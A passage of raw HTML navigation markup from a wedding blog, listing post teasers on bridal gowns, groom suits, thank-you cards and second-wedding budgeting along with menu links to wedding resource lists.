href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" itemprop="url" rel="bookmark"> 21 Princess Ball Gown Wedding Dresses for the Modern Bride </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-date updated" title="Permalink to 21 Princess Ball Gown Wedding Dresses for the Modern Bride" rel="bookmark"><time itemprop="datePublished" datetime="2019-02-15T11:08:46-04:00">February 15, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-02-15T11:08:46-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:01:41-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?fit=700%2C1050&#038;ssl=1'/> <meta itemprop='width' content='700'/> <meta itemprop='height' content='1050'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-attire wedding-dress"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9741 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-attire category-wedding-dress tag-groom tag-groom-fashion tag-groom-fashion-tips tag-groom-style tag-wedding-dress" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="MIchael Kors Men’s Classic-Fit Blue Birdseye Vested Suit" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/three-piece-suits-perfect-for-your-dashing-groom/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/three-piece-suits-perfect-for-your-dashing-groom/" itemprop="url" rel="bookmark"> Three-Piece Suits Perfect for Your Dashing Groom </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/three-piece-suits-perfect-for-your-dashing-groom/" class="vw-post-date updated" title="Permalink to Three-Piece Suits Perfect for Your Dashing Groom" rel="bookmark"><time itemprop="datePublished" datetime="2018-10-07T19:23:04-04:00">October 7, 2018</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2018-10-07T19:23:04-04:00"/><meta itemprop="dateModified" content="2019-05-08T12:58:21-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?fit=1230%2C1500&#038;ssl=1'/> <meta itemprop='width' content='1230'/> <meta itemprop='height' content='1500'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-attire"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9071 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-attire tag-groom tag-guys-style tag-mens-accessories tag-mens-fashion tag-wedding-guest" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/10/man-in-suit-with-necktie-tieclip-and-ring-1600.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/not-wear-wedding-guys/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/not-wear-wedding-guys/" itemprop="url" rel="bookmark"> What Not to Wear to a Wedding For Guys </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/not-wear-wedding-guys/" class="vw-post-date updated" title="Permalink to What Not to Wear to a Wedding For Guys" rel="bookmark"><time itemprop="datePublished" datetime="2017-10-05T09:57:33-04:00">October 5, 2017</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2017-10-05T09:57:33-04:00"/><meta itemprop="dateModified" content="2019-04-17T13:18:34-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/10/man-in-suit-with-necktie-tieclip-and-ring-1600.jpg?fit=1599%2C1206&#038;ssl=1'/> <meta itemprop='width' content='1599'/> <meta itemprop='height' content='1206'/> </div> </div> </div> </div> </div></div></div> </li> <li id="menu-item-5488" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5488 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/category/second-wedding-2/" class=" menu-link main-menu-link"><span>Second Wedding</span></a></li> <li id="menu-item-5494" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5494 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/category/wedding-vows-ceremonies/" class=" menu-link main-menu-link"><span>Vows Renewal</span></a></li> <li id="menu-item-152" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-152 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="http://www.top10weddingsites.com/" class=" menu-link main-menu-link"><span>Top 10 Lists</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li id="menu-item-5647" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5647 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-invitation-ideas.html" class=" menu-link sub-menu-link"><span>Wedding Invitation Sites</span></a></li> <li id="menu-item-5648" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5648 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-blogs.html" class=" menu-link sub-menu-link"><span>Top Wedding Blogs</span></a></li> <li id="menu-item-5649" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5649 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-website-tools.html" class=" menu-link sub-menu-link"><span>Wedding Website Tools</span></a></li> <li id="menu-item-5650" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5650 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-magazines.html" class=" menu-link sub-menu-link"><span>Top Wedding Magazines</span></a></li> <li id="menu-item-8616" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8616 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-favors.html" class=" menu-link sub-menu-link"><span>Top Wedding Favor Stores</span></a></li> <li id="menu-item-5651" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5651 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/finding-wedding-music.html" class=" menu-link sub-menu-link"><span>Top Wedding Music Lists</span></a></li> <li id="menu-item-5652" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5652 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/retail-wedding-registries.html" class=" menu-link sub-menu-link"><span>Top Wedding Registries</span></a></li> <li id="menu-item-8617" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8617 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/etsy.html" class=" menu-link sub-menu-link"><span>Top Etsy Wedding Ideas</span></a></li> </ul> </div> </li> <li id="menu-item-8585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8585 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/etiquette-planning/" class=" menu-link main-menu-link"><span>Etiquette &#038; Planning</span></a><div class="sub-menu-wrapper"><div class="vw-mega-menu-area vw-mega-menu-area--post"> <div class="vw-loop vw-loop--block-h vw-loop--block-h-4 vw-loop--border-bottom"> <div class="vw-flex-grid vw-flex-grid--sm-2 vw-flex-grid--lg-4 vw-flex-grid--medium-gap vw-flex-grid---no-grow"> <div class="vw-flex-grid__item" data-slugs="card-idea etiquette-planning inspiration wedding-planning-2"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9918 post type-post status-publish format-standard has-post-thumbnail hentry category-card-idea category-etiquette-planning category-inspiration category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="thank you card examples" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" itemprop="url" rel="bookmark"> 10 Wedding Thank-You Card Examples You&#8217;ll Love </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-date updated" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-23T11:04:17-04:00">January 23, 2019</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-23T11:04:17-04:00"/><meta itemprop="dateModified" content="2019-05-07T17:49:21-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?fit=1200%2C857&#038;ssl=1'/> <meta itemprop='width' content='1200'/> <meta itemprop='height' content='857'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="etiquette-planning inspiration second-wedding-2 wedding-advice wedding-planning-2"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9841 post type-post status-publish format-standard has-post-thumbnail hentry category-etiquette-planning category-inspiration category-second-wedding-2 category-wedding-advice category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="how to save money on a second wedding" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" itemprop="url" rel="bookmark"> Save Money on Your Second Wedding: 10 Great Ideas </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" class="vw-post-date updated" title="Permalink to Save Money on Your Second Wedding: 10 Great Ideas" rel="bookmark"><time itemprop="datePublished" datetime="2018-11-28T11:23:54-04:00">November 28, 2018</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2018-11-28T11:23:54-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:28:52-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?fit=1000%2C667&#038;ssl=1'/> <meta itemprop='width' content='1000'/> <meta itemprop='height' content='667'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="etiquette-planning wedding-advice"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9598 post type-post status-publish format-standard has-post-thumbnail hentry category-etiquette-planning category-wedding-advice tag-cards tag-gifts tag-thank-you tag-thank-you-notes tag-thanks" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-before-sending-out-thank-you-cards/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/everything-you-need-to-know-before-sending-out-thank-you-cards/" itemprop="url" rel="bookmark"> Everything You Need to Know Before Sending Out Thank You Cards </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-before-sending-out-thank-you-cards/" class="vw-post-date updated" title="Permalink to Everything You Need to Know Before Sending Out Thank You Cards" rel="bookmark"><time itemprop="datePublished" datetime="2018-07-10T08:45:27-04:00">July 10, 2018</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2018-07-10T08:45:27-04:00"/><meta itemprop="dateModified" content="2018-07-10T08:45:27-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/07/Wedding-Thank-you-Cards.png?fit=975%2C650&#038;ssl=1'/> <meta itemprop='width' content='975'/> <meta itemprop='height' content='650'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="decoration etiquette-planning"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9389 post type-post status-publish format-standard has-post-thumbnail hentry category-decoration category-etiquette-planning tag-ideas tag-innovative tag-inspiration-2 tag-tradition" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/03/pexels-photo-684968.jpeg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/thinking-something-little-different-big-day-check-alternative-wedding-ideas/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/thinking-something-little-different-big-day-check-alternative-wedding-ideas/" itemprop="url" rel="bookmark"> Thinking of something a little different for your big day? Check out these alternative wedding ideas </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/thinking-something-little-different-big-day-check-alternative-wedding-ideas/" class="vw-post-date updated" title="Permalink to Thinking of something a little different for your big day? Check out these alternative wedding ideas" rel="bookmark"><time itemprop="datePublished" datetime="2018-03-09T12:10:05-04:00">March 9, 2018</time></a> </div> </div> </div> <meta itemprop="datePublished" content="2018-03-09T12:10:05-04:00"/><meta itemprop="dateModified" content="2018-03-09T12:10:05-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/03/pexels-photo-684968.jpeg?fit=1280%2C853&#038;ssl=1'/> <meta itemprop='width' content='1280'/> <meta itemprop='height' content='853'/> </div> </div> </div> </div> </div></div></div> </li> <li id="menu-item-8586" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8586 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/inspiration/" class=" menu-link main-menu-link"><span>Inspiration</span></a><div class="sub-menu-wrapper"><div class="vw-mega-menu-area vw-mega-menu-area--post"> <div class="vw-loop vw-loop--block-h vw-loop--block-h-4 vw-loop--border-bottom"> <div class="vw-flex-grid vw-flex-grid--sm-2 vw-flex-grid--lg-4 vw-flex-grid--medium-gap vw-flex-grid---no-grow"> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-attire wedding-dress"> <div class="vw-post-box vw-post-box--block-h vw-inview post-9924 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-attire category-wedding-dress tag-wedding-dresses" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="fall 2019 look 13 carolina herrera bridal" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <h5 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" itemprop="url" rel="bookmark"> 21 Princess Ball Gown Wedding Dresses for the Modern Bride </a> </h5> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-date updated" title="Permalink to 21 Princess Ball Gown Wedding Dresses for the Modern Bride" rel="bookmark"><time itemprop="datePublished" 